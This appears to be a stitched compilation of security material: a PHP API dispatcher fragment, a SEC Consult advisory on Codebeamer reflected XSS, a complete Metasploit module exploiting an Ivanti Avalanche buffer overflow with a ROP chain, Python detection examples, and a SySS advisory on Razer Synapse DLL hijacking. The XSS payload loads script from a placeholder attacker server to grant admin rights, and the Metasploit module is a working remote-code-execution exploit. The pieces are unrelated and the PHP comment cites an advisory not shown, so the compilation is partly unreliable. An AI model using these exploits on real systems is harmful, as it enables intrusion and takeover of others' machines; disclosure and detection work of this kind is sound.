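declare(strict_types=1);

// Assumed role hierarchy of the administrative web application.
const ROLE_RANK = ['ReadOnly' => 1, 'Operator' => 2, 'Admin' => 3];

// Registry: exposed name => [handler, minimum role]. Only entries listed
// here are callable through the API, regardless of what the client sends.
function api_registry(): array
{
    return [
        'getAcdQueueInfo' => ['handler' => 'handler_get_acd_queue_info', 'role' => 'ReadOnly'],
        'setAcdQueue'     => ['handler' => 'handler_set_acd_queue',      'role' => 'Admin'],
    ];
}

// Assumed stand-in handlers.
function handler_get_acd_queue_info(?array $args): array
{
    return ['queue' => $args['queue'] ?? 'default', 'agents' => 3];
}

function handler_set_acd_queue(?array $args): array
{
    return ['updated' => $args['queue'] ?? 'default'];
}

// Returns ['status' => int, 'body' => mixed]; takes the session and POST
// arrays as parameters so it can be exercised without a web server.
function dispatch(array $session, array $post): array
{
    $role = (string)($session['Role'] ?? '');
    if (empty($session['Authenticated']) || !array_key_exists($role, ROLE_RANK)) {
        return ['status' => 401, 'body' => null];
    }
    $method = is_string($post['method'] ?? null) ? trim($post['method']) : '';
    $entry  = api_registry()[$method] ?? null;
    if ($entry === null) {
        // Unknown name: rejected before function_exists()/is_callable() is
        // ever consulted, so internal helpers are unreachable by design.
        return ['status' => 404, 'body' => null];
    }
    if (ROLE_RANK[$role] < ROLE_RANK[$entry['role']]) {
        return ['status' => 403, 'body' => null];
    }
    $args = null;
    if (isset($post['args'])) {
        $args = json_decode((string)$post['args'], true, 8);
        if (!is_array($args)) {
            return ['status' => 400, 'body' => null];
        }
    }
    return ['status' => 200, 'body' => ($entry['handler'])($args)];
}

// Constructed requests from a ReadOnly session.
$ro = ['Authenticated' => true, 'Role' => 'ReadOnly'];
print_r(dispatch($ro, ['method' => 'getAcdQueueInfo', 'args' => '{"queue":"sales"}'])); // 200
print_r(dispatch($ro, ['method' => 'cfgUtilShellExecSudo']));                          // 404: not registered
print_r(dispatch($ro, ['method' => 'setAcdQueue']));                                   // 403: needs Admin
print_r(dispatch([], ['method' => 'getAcdQueueInfo']));                                // 401: no session
```

Two properties matter here and are worth checking in any review of a dispatcher like this one: the name sent by the client is used only as a lookup key into a fixed table, never passed to function_exists() or called directly, and the authorisation decision is per method rather than a single "is logged in" check, which is what made a ReadOnly account sufficient in the advisory.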
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230829-0 ><br />=======================================================================<br /> title: Reflected Cross-Site Scripting (XSS)<br /> product: PTC - Codebeamer (ALM Solution)<br /> vulnerable version: <=22.10-SP7, <=22.04-SP5, <=21.09-SP13<br /> fixed version: >=22.10-SP8, >=22.04-SP6, >=21.09-SP14<br /> CVE number: CVE-2023-4296<br /> impact: high<br /> homepage: https://www.ptc.com/en/products/codebeamer<br /> found: 2023-04-14<br /> by: Niklas Schilling (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Codebeamer offers unique digital workflows that help your teams improve<br />development collaboration, product line development efficiency, and regulatory<br />compliance. Codebeamer's open platform extends application lifecycle management<br />functionalities with product line configuration capabilities, and provides<br />unique configurability for complex processes. Connect all development tools to<br />give your teams a single development platform. 
You can also easily adapt the<br />solution to specific development needs and automate process control for<br />regulatory compliance."<br /><br />Source: https://www.ptc.com/en/products/codebeamer<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends that PTC customers install the latest updates.<br /><br />Furthermore, an in-depth security analysis performed by security professionals<br />is highly advised, as the software may be affected by other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Reflected Cross-Site Scripting (XSS) Vulnerability (CVE-2023-4296)<br />The dynamic Error Page in Codebeamer is vulnerable to a reflected XSS attack.<br />It successfully sanitizes malicious HTML tags such as <script> and various<br />JavaScript events like "onload" or "onerror" that can be used to execute arbitrary<br />JavaScript code when a certain event occurs.<br /><br />However, it was possible to bypass these restrictions, allowing an attacker<br />to inject arbitrary JavaScript code which will be executed in the victim's<br />browser upon clicking on a malicious link.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Reflected Cross-Site Scripting (XSS) Vulnerability (CVE-2023-4296)<br />To verify this vulnerability, it is sufficient to open the following URL as<br />an unauthenticated user in a web browser:<br />https://<CODEBEAMER_SERVER>/errorHandler.spr?fileName=<html onpointermove = alert(window.origin)><br /><br />When a user now moves the cursor anywhere on the Error Page, the<br />"onpointermove" event triggers, resulting in the execution of the alert()<br />function.<br /><br />To further demonstrate the criticality of this vulnerability, the following<br />XSS payload can be used:<br /><br />https://<CODEBEAMER_SERVER>/errorHandler.spr?fileName=<html onpointermove =<br 
/>"if(!document.getElementById('SEC1337')){window.x=document.createElement('script');<br />window.x.id='SEC1337';window.x.src ='https://<ATTACKER_SERVER>/poc.js';<br />document.body.appendChild(window.x);}"></html><br /><br />Note that the space before the equal sign in "window.x.src ='https://<ATTACKER_SERVER>/poc.js'"<br />is mandatory, as this section of the payload would otherwise be truncated to<br />"window.x." by the application, completely removing the URL of the attacker<br />server.<br /><br />When an admin user now clicks on this malicious link, an external JavaScript<br />file will be loaded (poc.js), which can be found below. The included<br />JavaScript code creates a hidden iframe which loads the page with the User<br />Registration settings. This page allows specifying, via multiple checkboxes,<br />whether newly registered accounts should be assigned to certain groups.<br />The script now automatically selects the checkbox<br />"System Administrator", resulting in newly registered accounts having admin<br />privileges in the application. As this attack takes place in a hidden iframe,<br />the victim doesn't get any visual feedback that the attack is happening.<br /><br />Attack Sequence:<br />1. Send the malicious link to an administrator.<br />2. Wait for the administrator to click on the malicious link.<br />3. 
Register a new account with automatic admin privileges.<br /><br />Content of poc.js:<br />frame = document.createElement("iframe");<br />frame.addEventListener("load", function() {<br /> setTimeout(function(){<br /> frame.contentDocument.getElementById("roles1").click();<br /> frame.contentDocument.getElementById("notificationFrom").value = "example@sec-consult.com";<br /> frame.contentDocument.getElementById("notificationAddress").value = "example@sec-consult.com";<br /> frame.contentDocument.getElementsByClassName("actionBar")[0].childNodes[1].click();<br /> }, 2000)<br />});<br />frame.src = "http://<CODEBEAMER_SERVER>/sysadmin/configUserRegistration.spr";<br />frame.style="position: absolute;width:0;height:0;border:0;";<br />document.body.append(frame);<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following Codebeamer versions are affected by this vulnerability:<br /><=22.10-SP7, <=22.04-SP5, <=21.09-SP13<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-06-05: Sending the advisory to cvd@ptc.com<br />2023-06-05: Vendor confirms receipt of advisory.<br />2023-06-16: Vendor confirms vulnerability and mentions a fix in version "22.10-SP6".<br />2023-06-19: Informing the vendor that version "22.10-SP6" is still vulnerable.<br />2023-06-21: Vendor confirms that the vulnerability still exists in version<br /> "22.10-SP6" and that it's actually fixed in version "22.10-SP7".<br /> Furthermore, vendor asks if we're fine with a public disclosure via CISA.<br />2023-06-22: Informing vendor that public disclosure via CISA is fine.<br />2023-06-22: Vendor mentions that they will contact CISA and keep us in the loop.<br />2023-07-14: Asking vendor for a status update regarding CISA.<br />2023-07-14: Vendor requests access to CISA VINCE for a public disclosure.<br />2023-07-14: Access granted to CISA VINCE.<br />2023-08-01: Date of public disclosure set to 2023-08-29.<br />2023-08-29: Coordinated 
advisory release.<br /><br /><br />Solution:<br />---------<br />Update version "22.10-X" to "22.10-SP8" or later.<br />Update version "22.04-X" to "22.04-SP6" or later.<br />Update version "21.09-X" to "21.09-SP14" or later.<br /><br />The following URL was provided by the vendor with additional remediation information:<br />https://codebeamer.com/cb/wiki/31346480<br /><br /><br />Workaround:<br />-----------<br />No workaround available.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />EOF N. Schilling / @2023<br /><br /></code></pre>
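The filter bypass described in the advisory above, as an added example that is not Codebeamer's or SEC Consult's code: a hypothetical blacklist filter that strips exactly what the advisory says is sanitized (the script tag plus onload and onerror handlers) beside the contextual output encoding that closes the whole class, with an HTML-parser check that lists any executable attribute left in the rendered error page. The page template, the filter's regular expressions and all function names are assumptions.

```python
"""Why blacklisting event handlers fails: the reflected ?fileName= value from
CVE-2023-4296, passed through a hypothetical filter that strips what the
advisory says is sanitized, versus contextual output encoding.
Added example, not Codebeamer's code; the filter, page template and function
names are assumptions."""
import html
import re
from html.parser import HTMLParser
from typing import List

# First payload from the advisory, as it arrives in the fileName parameter.
PAYLOAD = "<html onpointermove = alert(window.origin)>"

# Hypothetical blacklist: removes <script> tags and onload/onerror handlers.
_SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)
_BAD_EVENTS = re.compile(r"\bon(?:load|error)\s*=", re.IGNORECASE)


def blacklist_sanitize(value: str) -> str:
    """Strips the handful of constructs on the blacklist and nothing else."""
    return _BAD_EVENTS.sub("", _SCRIPT_TAG.sub("", value))


def render_blacklist(file_name: str) -> str:
    """Vulnerable pattern: filtered but unencoded value lands in HTML text."""
    return f"<p>File not found: {blacklist_sanitize(file_name)}</p>"


def render_encoded(file_name: str) -> str:
    """Hardened pattern: encode for the HTML text context, whatever the value."""
    return f"<p>File not found: {html.escape(file_name, quote=True)}</p>"


class _ActiveContentFinder(HTMLParser):
    """Records anything in the rendered page that a browser would execute:
    <script> elements, any on* handler attribute, or javascript: URLs."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script")
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"{tag}@{name}")
            elif name.lower() in ("src", "href") and value \
                    and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}@{name}=javascript:")


def active_content(rendered_html: str) -> List[str]:
    """Return the executable constructs found in a rendered page ([] if none)."""
    finder = _ActiveContentFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    # The blacklist catches onerror but lets onpointermove straight through;
    # encoding neutralizes both because it never treats the input as markup.
    for render in (render_blacklist, render_encoded):
        for probe in ("<img src=x onerror=alert(1)>", PAYLOAD):
            print(render.__name__, active_content(render(probe)))
```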
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti Avalanche MDM Buffer Overflow',<br /> 'Description' => %q{<br /> This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.<br /> An attacker can send a specially crafted message to the Wavelink Avalanche Manager,<br /> which could result in arbitrary code execution with NT AUTHORITY\SYSTEM permissions.<br /> This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.<br /> The program tries to copy the item data using `qmemcpy` to a fixed size data buffer on stack.<br /> Upon successful exploitation the attacker gains full access to the target system.<br /><br /> This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ege BALCI egebalci[at]pm.me', # PoC & Msf Module<br /> 'A researcher at Tenable' # Discovery<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-32560'],<br /> ['URL', 'https://www.tenable.com/security/research/tra-2023-27'],<br /> ['URL', 'https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1']<br /> ],<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_X86,<br /> 'Payload' => {<br /> 'BadChars' => "\x3b"<br /> },<br /> 'Targets' => [['Ivanti Avalanche <= v6.4.0.0', {}]],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-08-14',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br 
/> )<br /> )<br /><br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'The remote Avalanche Manager port', 1777])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> begin<br /> connect<br /> rescue StandardError<br /> print_error('Could not connect to target!')<br /> return Exploit::CheckCode::Safe<br /> end<br /> res = sock.get_once<br /><br /> if res =~ /p\.guid/<br /> return Exploit::CheckCode::Appears<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def exploit<br /> expected_payload_size = 622<br /><br /> # This is a custom ROP chain for bypassing DEP via VirtualAlloc<br /> rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;<br /> rop_chain += [0x00001000].pack('V') # flAllocationType<br /> rop_chain += [0x00499ac0].pack('V') # pop eax ; ret ;<br /> rop_chain += [0x0056a208].pack('V') # VirtualAlloc IAT entry<br /> rop_chain += [0x00566650].pack('V') # pop ecx ; ret ;<br /> rop_chain += [0x00000040].pack('V') # flProtect<br /> rop_chain += [0x0054b079].pack('V') # pop ebx ; ret ;<br /> rop_chain += [0x00000320].pack('V') # dwSize<br /> rop_chain += [0x00402323].pack('V') # pop ebp; ret<br /> rop_chain += [0x0055642a].pack('V') # pop eax; ret<br /> rop_chain += [0x0052ad90].pack('V') # pop esi; ret;<br /> rop_chain += [0x0042792f].pack('V') # jmp [eax]<br /> rop_chain += [0x00521907].pack('V') # pop edi ; ret ;<br /> rop_chain += [0x00568968].pack('V') # ret ;<br /> rop_chain += [0x004995ab].pack('V') # pushad ; ret ;<br /> rop_chain += [0x00499c20].pack('V') # push esp ; ret<br /><br /> # Because of the compiler optimized `qmemcpy`<br /> # we are not able to directly return to our smashed stack.<br /> # This buffer re-arranges the entire stack for escaping<br /> # the longass function without crashing.<br /> buf = Rex::Text.rand_text_alpha(136)<br /> buf += [0].pack('V') # set empty register<br /> buf += [0].pack('V') # set empty register<br /> buf += [0].pack('V') # stack alignment buffer<br /> buf += [0].pack('V') # stack alignment buffer<br /> buf += [0x00511a80].pack('V') # ESP -> $(rop: "add esp, 0x10 ; ret ;")<br /> buf += [0x00583900].pack('V') # .data section scratch space<br /> buf += [0x00583900].pack('V') # .data section scratch space<br /> buf += [0x00585858].pack('V') # .data section scratch space<br /> buf += [0x00585857].pack('V') # .data section scratch space<br /><br /> # ==================<br /> name1 = 'h.mid'<br /> value1 = "\x30"<br /><br /> name2 = 'h.cmd'<br /> value2 = "\x31\x39"<br /><br /> name3 = 'p.waitprofile'<br /> value3 = (buf + rop_chain + make_nops(expected_payload_size - payload.encoded.length) + payload.encoded)<br /><br /> item1 = [2].pack('N')<br /> item1 += [name1.length].pack('N')<br /> item1 += [value1.length].pack('N')<br /> item1 += name1 + value1<br /><br /> item2 = [2].pack('N')<br /> item2 += [name2.length].pack('N')<br /> item2 += [value2.length].pack('N')<br /> item2 += name2 + value2<br /><br /> item3 = [101].pack('N')<br /> item3 += [name3.length].pack('N')<br /> item3 += [value3.length].pack('N')<br /> item3 += name3 + value3<br /><br /> hp = item1 + item2 + item3<br /> if hp.length % 16 != 0 # Add padding if the length is not a multiple of 16<br /> hp += ("\x00" * (16 - (hp.length % 16)))<br /> end<br /><br /> preamble = [hp.length + 16].pack('N')<br /> preamble += [item1.length + item2.length].pack('N')<br /> preamble += [(hp.length + 16) - 0x3b].pack('N')<br /> preamble += [0].pack('N')<br /><br /> packet = preamble + hp<br /><br /> print_status('Connecting to target...')<br /> connect<br /> res = sock.get_once<br /> fail_with(Failure::UnexpectedReply, 'Could not connect to MDM service - no response') if res.nil?<br /><br /> print_status('Sending payload...')<br /> sock.put(packet)<br /> disconnect<br /> end<br />end<br /></code></pre>
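Detection logic for the item framing the module above sends, as an added example that is not part of the Metasploit module: a bounds-checked parser for the preamble and item layout the module packs, and a check that flags items of the types the module names (3/5/8/100/101/102) whose value exceeds a length limit. The layout is inferred from the module's packing code; the 256-byte limit, the function names and the sample packets are assumptions and constructed test data.

```python
"""Bounds-checked parser and item-length check for the Avalanche Manager
framing used by CVE-2023-32560 (added detection example, not the module's
code). Layout inferred from the module: 16-byte big-endian preamble (total
length, length of the first two items, total length minus 0x3b, zero), then
items of type|name_len|value_len|name|value, zero-padded to 16 bytes."""
import struct
from typing import List, Tuple

Item = Tuple[int, bytes, bytes]

# Item types the module says are copied into a fixed-size stack buffer.
RISKY_TYPES = {3, 5, 8, 100, 101, 102}
# Assumed alert threshold; the real buffer size is not on the page.
MAX_SAFE_VALUE_LEN = 256


class MalformedPacket(ValueError):
    """Raised when declared lengths do not match the bytes present."""


def parse_items(packet: bytes) -> List[Item]:
    """Return (type, name, value) for every item, checking each declared
    length against the bytes actually present so a truncated or lying
    packet raises instead of being read past its end."""
    if len(packet) < 16:
        raise MalformedPacket("short preamble")
    total_len = struct.unpack(">I", packet[:4])[0]
    if total_len != len(packet):
        raise MalformedPacket(f"declared {total_len} bytes, got {len(packet)}")
    body, items, off = packet[16:], [], 0
    while off + 12 <= len(body):
        item_type, name_len, value_len = struct.unpack(">III", body[off:off + 12])
        if item_type == 0 and name_len == 0 and value_len == 0:
            break  # reached the zero padding after the last item
        end = off + 12 + name_len + value_len
        if end > len(body):
            raise MalformedPacket("item length exceeds packet")
        name = body[off + 12:off + 12 + name_len]
        items.append((item_type, name, body[off + 12 + name_len:end]))
        off = end
    if any(body[off:]):  # only zero padding may follow the last item
        raise MalformedPacket("trailing bytes after last item")
    return items


def oversized_items(packet: bytes, limit: int = MAX_SAFE_VALUE_LEN) -> List[Tuple[int, str, int]]:
    """Items of a risky type whose value is longer than the limit, i.e. the
    condition the module relies on to overflow the stack buffer."""
    return [(t, name.decode("latin-1"), len(value))
            for t, name, value in parse_items(packet)
            if t in RISKY_TYPES and len(value) > limit]


def build_packet(items: List[Item]) -> bytes:
    """Encoder mirroring the module's framing, used only to construct test traffic."""
    body = b"".join(struct.pack(">III", t, len(n), len(v)) + n + v for t, n, v in items)
    body += b"\x00" * (-len(body) % 16)
    total = len(body) + 16
    head_items = sum(12 + len(n) + len(v) for _, n, v in items[:2])
    return struct.pack(">IIII", total, head_items, (total - 0x3b) & 0xFFFFFFFF, 0) + body


# Constructed samples: the same three item names the module sends, but with
# harmless filler values instead of a payload.
BENIGN = build_packet([(2, b"h.mid", b"0"), (2, b"h.cmd", b"19"),
                       (101, b"p.waitprofile", b"A" * 32)])
SUSPECT = build_packet([(2, b"h.mid", b"0"), (2, b"h.cmd", b"19"),
                        (101, b"p.waitprofile", b"A" * 900)])

if __name__ == "__main__":
    print("benign:", oversized_items(BENIGN))    # []
    print("suspect:", oversized_items(SUSPECT))  # [(101, 'p.waitprofile', 900)]
```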
<pre><code>Advisory ID: SYSS-2023-002<br />Product: Razer Synapse<br />Manufacturer: Razer Inc.<br />Affected Version(s): Versions before 3.8.0428.042117 (20230601)<br />Tested Version(s): 3.8.0228.022313 (20230315)<br /> under Windows 10 Pro (10.0.19044)<br /> under Windows 11 Home (10.0.22621)<br />Vulnerability Type: Improper Privilege Management (CWE-269)<br /> Time-of-check Time-of-use Race Condition (CWE-367)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2023-03-23<br />Solution Date: 2023-04-28<br />Public Disclosure: 2023-08-31<br />CVE Reference: CVE-2022-47631<br />Author of Advisory: Dr. Oliver Schwarz, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Razer Synapse is additional driver software for Razer gaming devices.<br />The manufacturer describes the product as a "unified cloud-based<br />hardware configuration tool" (see [1]).<br /><br />Due to an unsafe installation path, improper privilege management, and a<br />time-of-check time-of-use race condition, the associated system service<br />"Razer Synapse Service" is vulnerable to DLL hijacking.<br />As a result, local Windows users can abuse the Razer driver installer to<br />obtain administrative privileges on Windows.<br /><br />In order to exploit the vulnerability, the attacker needs physical<br />access to the machine and needs to prepare the attack before Razer<br />Synapse is installed along with a Razer driver.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The attack scenario considers a Windows machine without any previous<br />installation of any Razer device or software.<br />The attacker has a local unprivileged Windows account, physical access<br />to the machine, and a device which is either a Razer peripheral or able<br />to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero).<br />The attacker aims to execute code with full system privileges.<br /><br />The attack exploits the Razer Synapse Service which runs with elevated<br />privileges. While the main binary of the service is stored in the<br />protected location "C:\Program Files (x86)\Razer\Synapse3\Service", it<br />dynamically loads libraries from<br />"C:\ProgramData\Razer\Synapse3\Service\bin".<br />Before the installation, standard users can write to this path, since<br />"C:\ProgramData" is world-writable on a standard installation of<br />Windows.<br /><br />The Synapse installation procedure changes access privileges, so that<br />standard users cannot write to the path any longer.<br />However, if the path is created before the driver installation, the<br />creator can set their own files to be read-only and deny write access for<br />the SYSTEM user.<br /><br />Upon start, the Synapse service checks the location for foreign DLLs,<br />removes them, and aborts upon failure to delete them.<br />However, due to a time-of-check time-of-use race condition, attackers<br />can replace a benign DLL after it has been checked and before it is<br />loaded.<br /><br />Note that the described vulnerability is similar to CVE-2021-44226<br />(SYSS-2021-058) and CVE-2022-47632 (SYSS-2022-047), which Razer Inc.<br />fixed in March and September of 2022, respectively.<br />The new attack differs from the earlier ones in that the attacker<br />now has to exploit a race condition.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The attack consists of the following steps:<br /><br />1. Before the installation of the driver/Synapse, the attacker creates<br /> "C:\ProgramData\Razer\Synapse3\Service\bin", copies a custom<br /> malicious version of userenv.dll into the directory, sets the DLL to<br /> read-only, and denies write access for SYSTEM.<br /><br />2. Afterwards, the attacker triggers the installation of Synapse.<br /> This can be done without any elevated privileges by plugging in a<br /> Razer device and following the installation procedure for Synapse<br /> if device-specific co-installers are not disabled.<br /> Alternatively, a device such as a Bash Bunny or a Raspberry Pi Zero<br /> can be used to pretend to be a Razer device.<br /><br />3. With the help of a script, the attacker monitors the installation<br /> progress. As soon as legitimate DLL files show up in the directory,<br /> the attacker temporarily overwrites the malicious DLL with a<br /> legitimate one, waits for the DLL to be assessed (i.e., read), and<br /> then quickly copies back the malicious content to the DLL before it<br /> is actually loaded and executed.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Razer has published a patched version that will be deployed automatically<br />upon driver installation on current Windows builds.<br /><br />To prevent similar attacks through other co-installers, system<br />administrators can disable them by setting the following key in the<br />Windows registry:<br />HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer\DisableCoInstallers = 1<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-12-19: Vulnerability discovered<br />2023-03-23: Vulnerability reported to manufacturer<br />2023-04-28: Patch released by manufacturer<br />2023-08-31: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Razer Synapse 3<br /> https://www2.razer.com/eu-en/synapse-3<br />[2] SySS Security Advisory SYSS-2023-002<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-002.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] SySS Proof of Concept Video<br /> https://youtu.be/0myDcqmtt0U<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH.<br /><br />E-Mail: oliver.schwarz@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver_Schwarz.asc<br />Key ID: 0x9716294F1294280D<br />Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: https://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>